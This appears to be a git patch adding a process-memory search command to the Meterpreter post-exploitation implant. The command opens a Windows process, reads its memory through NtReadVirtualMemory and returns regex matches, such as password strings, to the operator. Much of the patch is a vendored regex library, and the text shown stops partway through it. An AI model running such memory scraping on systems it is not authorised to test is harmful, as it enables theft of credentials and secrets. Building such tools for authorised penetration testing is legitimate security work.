From 6e2889d64caf1787ba41e67e6db981024c0b2d87 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Tue, 28 Nov 2023 18:35:43 +0000 Subject: [PATCH 01/14] Add Windows Memory Search support using regex --- .../source/common/common_command_ids.h | 1 + .../source/extensions/stdapi/server/stdapi.c | 1 + .../stdapi/server/sys/process/memory.c | 341 ++++++++++++ .../stdapi/server/sys/process/process.h | 1 + .../source/extensions/stdapi/stdapi.h | 9 + c/meterpreter/source/tiny-regex-c/README.md | 3 + c/meterpreter/source/tiny-regex-c/re.c | 511 ++++++++++++++++++ c/meterpreter/source/tiny-regex-c/re.h | 75 +++ .../ext_server_stdapi/CMakeLists.txt | 2 + .../ext_server_stdapi.vcxproj | 2 + 10 files changed, 946 insertions(+) create mode 100644 c/meterpreter/source/tiny-regex-c/README.md create mode 100644 c/meterpreter/source/tiny-regex-c/re.c create mode 100644 c/meterpreter/source/tiny-regex-c/re.h diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h index f7ee80d66..e9951eecd 100755 --- a/c/meterpreter/source/common/common_command_ids.h +++ b/c/meterpreter/source/common/common_command_ids.h @@ -174,6 +174,7 @@ #define COMMAND_ID_STDAPI_AUDIO_MIC_START 1115 #define COMMAND_ID_STDAPI_AUDIO_MIC_STOP 1116 #define COMMAND_ID_STDAPI_AUDIO_MIC_LIST 1117 +#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH 1119 #define COMMAND_ID_PRIV_ELEVATE_GETSYSTEM 2001 #define COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE 2002 #define COMMAND_ID_PRIV_FS_BLANK_FILE_MACE 2003 diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c index cfa15fd8d..c9f54d2d0 100644 --- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c +++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c @@ -69,6 +69,7 @@ Command customCommands[] = COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT, request_sys_process_memory_protect), COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK, request_sys_process_memory_lock), COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK, request_sys_process_memory_unlock), + COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH, request_sys_process_memory_search), // Thread COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN, request_sys_process_thread_open), diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index 597f5d964..ea8ae32be 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -1,5 +1,6 @@ #include "precomp.h" #include "common_metapi.h" +#include "../tiny-regex-c/re.h" /*! * @brief Allocates memory in the context of the supplied process. @@ -339,3 +340,343 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet) return ERROR_SUCCESS; } + +typedef NTSTATUS* PNTSTATUS; + +#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) + +#ifndef __kernel_entry + #define __kernel_entry +#endif + +typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); + +typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); + +typedef BOOL(WINAPI* READPROCESSMEMORY) (HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T mSize, SIZE_T* lpNumberOfBytesRead); + +typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); + +typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); + +typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html +// https://ntdoc.m417z.com/ntreadvirtualmemory +typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html +typedef enum _MEMORY_INFORMATION_CLASS { + MemoryBasicInformation +} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtQueryVirtualMemory.html +typedef __kernel_entry NTSTATUS(NTAPI* NTQUERYVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, MEMORY_INFORMATION_CLASS MemoryInformationClass, LPVOID Buffer, SIZE_T Length, PSIZE_T ResultLength); + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING* PUNICODE_STRING; +typedef const UNICODE_STRING* PCUNICODE_STRING; + +// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; + +// https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/a11e7129-685b-4535-8d37-21d4596ac057 +typedef struct _CLIENT_ID { + HANDLE UniqueProcess; + HANDLE UniqueThread; +} CLIENT_ID, * PCLIENT_ID; + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProcess%2FNtOpenProcess.html +// https://ntdoc.m417z.com/ntopenprocess +typedef NTSTATUS(NTAPI* NTOPENPROCESS) (PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); + +//typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes +//{ +// DWORD dwLength; +// DWORD dwInitialized; +// LPVOID lpSsHandle; +// LIST_ENTRY InLoadOrderModuleList; +// LIST_ENTRY InMemoryOrderModuleList; +// LIST_ENTRY InInitializationOrderModuleList; +// LPVOID lpEntryInProgress; +//} PEB_LDR_DATA, * PPEB_LDR_DATA; + +typedef struct _RTL_USER_PROCESS_PARAMETERS { + BYTE Reserved1[16]; + PVOID Reserved2[10]; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; +} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; + +typedef +VOID +(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) ( + VOID + ); + +typedef struct _PEB { + BYTE Reserved1[2]; + BYTE BeingDebugged; + BYTE Reserved2[1]; + PVOID Reserved3[2]; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + BYTE Reserved4[104]; + PVOID Reserved5[52]; + PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; + BYTE Reserved6[128]; + PVOID Reserved7[1]; + ULONG SessionId; +} PEB, * PPEB; + +typedef struct _PROCESS_BASIC_INFORMATION { + PVOID Reserved1; + PPEB PebBaseAddress; + PVOID Reserved2[2]; + ULONG_PTR UniqueProcessId; + PVOID Reserved3; +} PROCESS_BASIC_INFORMATION; +typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION; + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation = 0, + ProcessWow64Information = 26 +} PROCESSINFOCLASS; + +BOOL can_read_memory(DWORD memory_protect) +{ + const int page_execute_read = 0x20; + const int page_execute_readwrite = 0x40; + const int page_readonly = 0x02; + const int page_readwrite = 0x04; + + return memory_protect == page_execute_read || + memory_protect == page_execute_readwrite || + memory_protect == page_readonly || + memory_protect == page_readwrite; +} + +// In order to be able to regex null-butes, we need to store the length explicitly, so that null-bytes aren't being treated as the end of a string. +struct regex_needle +{ + char* raw_needle_buffer; + size_t length; + regex_t* compiled_needle; +}; + +#define NEEDLES_MAX (size_t)5 + +DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) +{ + Packet* response = met_api->packet.create_response(packet); + DWORD result = ERROR_SUCCESS; + char* buffer = NULL; + size_t needle_enum_index = 0; + HANDLE process_handle = NULL; + + dprintf("[MEM SEARCH] Getting PID..."); + const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID); + if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; } + dprintf("[MEM SEARCH] Searching PID: %lu", pid); + + // Iterate over all the needles in the packet. + Tlv needle_buffer_tlv = { 0 }; + struct regex_needle* regex_needles[NEEDLES_MAX]; + while (needle_enum_index < (size_t)NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS) + { + // The header contains a null-terminator which we do not need. + const size_t needle_length = needle_buffer_tlv.header.length - 1; + dprintf("[MEM SEARCH] Allocating %u bytes of memory for regex needle", sizeof(struct regex_needle)); + regex_needles[needle_enum_index] = (struct regex_needle*)malloc(sizeof(struct regex_needle)); + if (regex_needles[needle_enum_index] == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for regex needle"); result = ERROR_OUTOFMEMORY; goto done; } + + regex_needles[needle_enum_index]->length = needle_length; + regex_needles[needle_enum_index]->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char)); + if (regex_needles[needle_enum_index]->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); result = ERROR_OUTOFMEMORY; goto done; } + memcpy(regex_needles[needle_enum_index]->raw_needle_buffer, (char*)needle_buffer_tlv.buffer, needle_length); + + dprintf("[MEM SEARCH] Needle %u : %.*s with size (in bytes) %u", needle_enum_index, needle_length, regex_needles[needle_enum_index]->raw_needle_buffer, needle_length); + + dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv.buffer); + regex_needles[needle_enum_index]->compiled_needle = re_compile(regex_needles[needle_enum_index]->raw_needle_buffer, regex_needles[needle_enum_index]->length); + if (regex_needles[needle_enum_index]->compiled_needle == NULL) { dprintf("[MEM SEARCH] Failed to compile needle"); result = ERROR_OUTOFMEMORY; goto done; } + + needle_enum_index++; + } + + dprintf("[MEM SEARCH] Getting Match Lengths"); + const size_t min_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_UINT); + const size_t max_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN); + if (min_match_length > max_match_length || max_match_length == 0) { dprintf("[MEM SEARCH] Incorrect min or max match lengths"); result = ERROR_INVALID_PARAMETER; goto done; } + const size_t current_max_match_length = max_match_length; + + dprintf("[MEM SEARCH] Getting handles & proc addresses"); + const HMODULE kernel32_dll = GetModuleHandleA("kernel32.dll"); + if (kernel32_dll == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); result = ERROR_INVALID_HANDLE; goto done; } + + const HMODULE ntdll_dll = GetModuleHandleA("ntdll.dll"); + if (ntdll_dll == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); result = ERROR_INVALID_HANDLE; goto done; } + + const HANDLE get_proc_address = GetProcAddress(kernel32_dll, "GetProcAddress"); + if (get_proc_address == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); result = ERROR_INVALID_ADDRESS; goto done; } + const GETPROCADDRESS GetProcAddress = (GETPROCADDRESS)get_proc_address; + + const HANDLE virtual_query_ex = GetProcAddress(kernel32_dll, "VirtualQueryEx"); + if (virtual_query_ex == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); result = ERROR_INVALID_ADDRESS; goto done; } + + const HANDLE open_process = GetProcAddress(kernel32_dll, "OpenProcess"); + if (open_process == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); result = ERROR_INVALID_ADDRESS; goto done; } + + const HANDLE close_handle = GetProcAddress(kernel32_dll, "CloseHandle"); + if (close_handle == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); result = ERROR_INVALID_ADDRESS; goto done; } + + const HANDLE nt_read_virtual_memory = GetProcAddress(ntdll_dll, "NtReadVirtualMemory"); + if (nt_read_virtual_memory == NULL) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); result = ERROR_INVALID_ADDRESS; goto done; } + + const OPENPROCESS OpenProcess = (OPENPROCESS)open_process; + const CLOSEHANDLE CloseHandle = (CLOSEHANDLE)close_handle; + const VIRTUALQUERYEX VirtualQueryEx = (VIRTUALQUERYEX)virtual_query_ex; + const NTREADVIRTUALMEMORY NtReadVirtualMemory = (NTREADVIRTUALMEMORY)nt_read_virtual_memory; + + const DWORD process_vm_read = 0x0010; + const DWORD process_query_information = 0x0400; + const DWORD wanted_process_perms = process_vm_read | process_query_information; + + dprintf("[MEM SEARCH] Opening process"); + process_handle = OpenProcess(wanted_process_perms, FALSE, pid); + if (process_handle == NULL) { dprintf("[MEM SEARCH] Could not get process handle"); result = ERROR_INVALID_HANDLE; goto done; } + + MEMORY_BASIC_INFORMATION mem = { 0 }; + const size_t megabytes_64 = 64 * 1024 * 1024; + + dprintf("[MEM SEARCH] Allocating buffer for storing process memory"); + buffer = (char*)malloc(megabytes_64); + if (buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } + + // The maximum length of data that we can read into a buffer at a time from a memory region. + const size_t current_max_size = megabytes_64; + + for (size_t current_ptr = 0; VirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) + { + if (!can_read_memory(mem.Protect)) { continue; } + + size_t memory_region_offset = 0; + // Note: This currently does not support regex'ing over multiple memory regions. + // e.g. + // regex = "my_password.*"; + // | ....my_pas | sword.... | + while (mem.RegionSize > memory_region_offset) + { + const size_t leftover_bytes = mem.RegionSize - memory_region_offset; + const size_t bytes_to_read = min(leftover_bytes, current_max_size); + dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes); + dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read); + size_t bytes_read = 0; + + const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset; + // Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached. + const NTSTATUS read_virtual_memory_status = NtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read); + if (read_virtual_memory_status != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); memory_region_offset += bytes_to_read; continue; } + + dprintf("[MEM SEARCH] Read %llu bytes", bytes_read); + // Note: Increment the offset so that we aren't stuck in an infinite loop, trying to read zero bytes from the same pointer. + if (bytes_read == 0) { dprintf("[MEM SEARCH] Read zero bytes from a readable memory region"); memory_region_offset += bytes_to_read; continue; } + + for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++) + { + // This is the buffer offset for this needle only. + size_t current_buffer_offset = 0; + size_t match_length = 0; + int result = -1; + + do + { + const char* current_buffer_ptr = buffer + current_buffer_offset; + const size_t bytes_to_regex = bytes_read - current_buffer_offset; + + result = re_matchp(regex_needles[current_needle_index]->compiled_needle, current_buffer_ptr, bytes_to_regex, &match_length); + + if (result != -1) + { + const size_t match_address = read_address + result; + dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --"); + dprintf("[MEM SEARCH] Address: %p", match_address); + + dprintf("[MEM SEARCH] Creating results group"); + + Packet* search_results = met_api->packet.create_group(); + if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); result = ERROR_OUTOFMEMORY; goto done; } + + dprintf("[MEM SEARCH] Adding results to packet group"); + + dprintf("[MEM SEARCH] Adding Match bytes"); + // TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached. + const size_t current_match_length = min(max_match_length, match_length); + + // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. + met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, buffer + current_buffer_offset + result, (DWORD)current_match_length); + + dprintf("[MEM SEARCH] Adding Match address"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); + + dprintf("[MEM SEARCH] Adding Region base address"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, (size_t)mem.BaseAddress); + + dprintf("[MEM SEARCH] Adding Region size"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, mem.RegionSize); + + dprintf("[MEM SEARCH] Adding Match Length"); + met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)current_match_length); + + dprintf("[MEM SEARCH] Adding Group"); + met_api->packet.add_group(response, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); + + current_buffer_offset += (result + current_match_length); + } + + } while (result != -1); + + } + + memory_region_offset += bytes_to_read; + } + } + + result = ERROR_SUCCESS; + +done: + dprintf("[MEM SEARCH] Memory Search complete."); + if (buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(buffer); } + if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); CloseHandle(process_handle); } + + dprintf("[MEM SEARCH] Cleaning up needles"); + for (size_t i = 0; i < needle_enum_index; i++) + { + if (regex_needles[i] != NULL) + { + if (regex_needles[i]->raw_needle_buffer != NULL) + { + dprintf("[MEM SEARCH] Freeing needle buffer"); + free(regex_needles[i]->raw_needle_buffer); + } + + dprintf("[MEM SEARCH] Freeing regex needle."); + free(regex_needles[i]); + } + } + + dprintf("[MEM SEARCH] Transmitting response"); + met_api->packet.transmit_response(result, remote, response); + return ERROR_SUCCESS; +} diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h index da04b4d23..85ca089cf 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/process.h @@ -46,6 +46,7 @@ DWORD request_sys_process_memory_query(Remote *remote, Packet *packet); DWORD request_sys_process_memory_protect(Remote *remote, Packet *packet); DWORD request_sys_process_memory_lock(Remote *remote, Packet *packet); DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet); +DWORD request_sys_process_memory_search(Remote *remote, Packet *packet); // Thread DWORD request_sys_process_thread_open(Remote *remote, Packet *packet); diff --git a/c/meterpreter/source/extensions/stdapi/stdapi.h b/c/meterpreter/source/extensions/stdapi/stdapi.h index 7ee5303a3..adc2b5b52 100755 --- a/c/meterpreter/source/extensions/stdapi/stdapi.h +++ b/c/meterpreter/source/extensions/stdapi/stdapi.h @@ -98,6 +98,15 @@ #define TLV_TYPE_REGISTER_VALUE_32 MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2542 ) #define TLV_TYPE_REGISTER MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2550 ) +// Memory - Taken from Mettle: https://github.com/rapid7/mettle/blob/master/mettle/src/tlv_types.h#L262 +#define TLV_TYPE_MEMORY_SEARCH_NEEDLE MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2650 ) +#define TLV_TYPE_MEMORY_SEARCH_RESULTS MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2651 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2652 ) +#define TLV_TYPE_MEMORY_SEARCH_START_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2653 ) +#define TLV_TYPE_MEMORY_SEARCH_SECT_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2654 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2655 ) +#define TLV_TYPE_MEMORY_SEARCH_MATCH_STR MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2656 ) + // Registry #define TLV_TYPE_HKEY MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 1000 ) #define TLV_TYPE_ROOT_KEY TLV_TYPE_HKEY diff --git a/c/meterpreter/source/tiny-regex-c/README.md b/c/meterpreter/source/tiny-regex-c/README.md new file mode 100644 index 000000000..a32fdb14e --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/README.md @@ -0,0 +1,3 @@ +# tiny-regex-c + +This library is taken from https://github.com/kokke/tiny-regex-c/tree/2d306a5a71128853d18292e8bb85c8e745fbc9d0 - with changes to support null-bytes. diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c new file mode 100644 index 000000000..0568bb994 --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/re.c @@ -0,0 +1,511 @@ +/* + * + * Mini regex-module inspired by Rob Pike's regex code described in: + * + * http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html + * + * + * + * Supports: + * --------- + * '.' Dot, matches any character + * '^' Start anchor, matches beginning of string + * '$' End anchor, matches end of string + * '*' Asterisk, match zero or more (greedy) + * '+' Plus, match one or more (greedy) + * '?' Question, match zero or one (non-greedy) + * '[abc]' Character class, match if one of {'a', 'b', 'c'} + * '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken! + * '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z } + * '\s' Whitespace, \t \f \r \n \v and spaces + * '\S' Non-whitespace + * '\w' Alphanumeric, [a-zA-Z0-9_] + * '\W' Non-alphanumeric + * '\d' Digits, [0-9] + * '\D' Non-digits + * + * + */ + + +#include "re.h" +#include +#include + +/* Definitions: */ + +#define MAX_REGEXP_OBJECTS 256 /* Max number of regex symbols in expression. */ +#define MAX_CHAR_CLASS_LEN 256 /* Max length of character-class buffer in. */ + + +enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; + +/* Private function declarations: */ +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); +static int matchcharclass(char c, const char* str); +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); +static int matchone(regex_t p, char c); +static int matchdigit(char c); +static int matchalpha(char c); +static int matchwhitespace(char c); +static int matchmetachar(char c, const char* str); +static int matchrange(char c, const char* str); +static int matchdot(char c); +static int ismetachar(char c); + + + +/* Public functions: */ +int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength) +{ + return re_matchp(re_compile(pattern, pattern_length), text, text_length, matchlength); +} + +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength) +{ + *matchlength = 0; + + if (pattern == 0 || text_length == 0) { return -1; } + + if (pattern[0].type == BEGIN) + { + return ((matchpattern(&pattern[1], text, text_length, 0, matchlength)) ? 0 : -1); + } + + size_t idx = -1; + + do + { + idx += 1; + + if (matchpattern(pattern, text, text_length, idx, matchlength)) + { + return (int)idx; + } + } + while (idx < text_length); + + return -1; +} + +re_t re_compile(const char* pattern, size_t pattern_length) +{ + /* The sizes of the two static arrays below substantiates the static RAM usage of this module. + MAX_REGEXP_OBJECTS is the max number of symbols in the expression. + MAX_CHAR_CLASS_LEN determines the size of buffer for chars in all char-classes in the expression. */ + static regex_t re_compiled[MAX_REGEXP_OBJECTS]; + static unsigned char ccl_buf[MAX_CHAR_CLASS_LEN]; + int ccl_bufidx = 1; + + char c; /* current char in pattern */ + int i = 0; /* index into pattern */ + int j = 0; /* index into re_compiled */ + + while (i < (int)pattern_length && (j+1 < MAX_REGEXP_OBJECTS)) + { + c = pattern[i]; + + switch (c) + { + /* Meta-characters: */ + case '^': { re_compiled[j].type = BEGIN; } break; + case '$': { re_compiled[j].type = END; } break; + case '.': { re_compiled[j].type = DOT; } break; + case '*': { re_compiled[j].type = STAR; } break; + case '+': { re_compiled[j].type = PLUS; } break; + case '?': { re_compiled[j].type = QUESTIONMARK; } break; +/* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */ + + /* Escaped character-classes (\s \w ...): */ + case '\\': + { + if (i + 1 < (int)pattern_length) + { + /* Skip the escape-char '\\' */ + i += 1; + /* ... and check the next */ + switch (pattern[i]) + { + /* Meta-character: */ + case 'd': { re_compiled[j].type = DIGIT; } break; + case 'D': { re_compiled[j].type = NOT_DIGIT; } break; + case 'w': { re_compiled[j].type = ALPHA; } break; + case 'W': { re_compiled[j].type = NOT_ALPHA; } break; + case 's': { re_compiled[j].type = WHITESPACE; } break; + case 'S': { re_compiled[j].type = NOT_WHITESPACE; } break; + + /* Escaped character, e.g. '.' or '$' */ + default: + { + re_compiled[j].type = CHAR; + re_compiled[j].u.ch = pattern[i]; + } break; + } + } + /* '\\' as last char in pattern -> invalid regular expression. */ +/* + else + { + re_compiled[j].type = CHAR; + re_compiled[j].ch = pattern[i]; + } +*/ + } break; + + /* Character class: */ + case '[': + { + /* Remember where the char-buffer starts. */ + int buf_begin = ccl_bufidx; + + /* Look-ahead to determine if negated */ + if (pattern[i+1] == '^') + { + re_compiled[j].type = INV_CHAR_CLASS; + i += 1; /* Increment i to avoid including '^' in the char-buffer */ + if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '^' */ + { + return 0; + } + } + else + { + re_compiled[j].type = CHAR_CLASS; + } + + /* Copy characters inside [..] to buffer */ + while ( (pattern[++i] != ']') + && (pattern[i] != '\0')) /* Missing ] */ + { + if (pattern[i] == '\\') + { + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1) + { + //fputs("exceeded internal buffer!\n", stderr); + return 0; + } + if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '\\' */ + { + return 0; + } + ccl_buf[ccl_bufidx++] = pattern[i++]; + } + else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + //fputs("exceeded internal buffer!\n", stderr); + return 0; + } + ccl_buf[ccl_bufidx++] = pattern[i]; + } + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + /* Catches cases such as [00000000000000000000000000000000000000][ */ + //fputs("exceeded internal buffer!\n", stderr); + return 0; + } + /* Null-terminate string end */ + ccl_buf[ccl_bufidx++] = 0; + re_compiled[j].u.ccl = &ccl_buf[buf_begin]; + } break; + + /* Other characters: */ + default: + { + re_compiled[j].type = CHAR; + re_compiled[j].u.ch = c; + } break; + } + /* no buffer-out-of-bounds access on invalid patterns - see https://github.com/kokke/tiny-regex-c/commit/1a279e04014b70b0695fba559a7c05d55e6ee90b */ + if (pattern[i] == 0) + { + return 0; + } + + i += 1; + j += 1; + } + /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ + re_compiled[j].type = UNUSED; + + return (re_t) re_compiled; +} + +void re_print(regex_t* pattern) +{ + const char* types[] = { "UNUSED", "DOT", "BEGIN", "END", "QUESTIONMARK", "STAR", "PLUS", "CHAR", "CHAR_CLASS", "INV_CHAR_CLASS", "DIGIT", "NOT_DIGIT", "ALPHA", "NOT_ALPHA", "WHITESPACE", "NOT_WHITESPACE", "BRANCH" }; + + int i; + int j; + char c; + for (i = 0; i < MAX_REGEXP_OBJECTS; ++i) + { + if (pattern[i].type == UNUSED) + { + break; + } + + printf("type: %s", types[pattern[i].type]); + if (pattern[i].type == CHAR_CLASS || pattern[i].type == INV_CHAR_CLASS) + { + printf(" ["); + for (j = 0; j < MAX_CHAR_CLASS_LEN; ++j) + { + c = pattern[i].u.ccl[j]; + if ((c == '\0') || (c == ']')) + { + break; + } + printf("%c", c); + } + printf("]"); + } + else if (pattern[i].type == CHAR) + { + printf(" '%c'", pattern[i].u.ch); + } + printf("\n"); + } +} + + + +/* Private functions: */ +static int matchdigit(char c) +{ + return isdigit(c); +} +static int matchalpha(char c) +{ + return isalpha(c); +} +static int matchwhitespace(char c) +{ + return isspace(c); +} +static int matchalphanum(char c) +{ + return ((c == '_') || matchalpha(c) || matchdigit(c)); +} 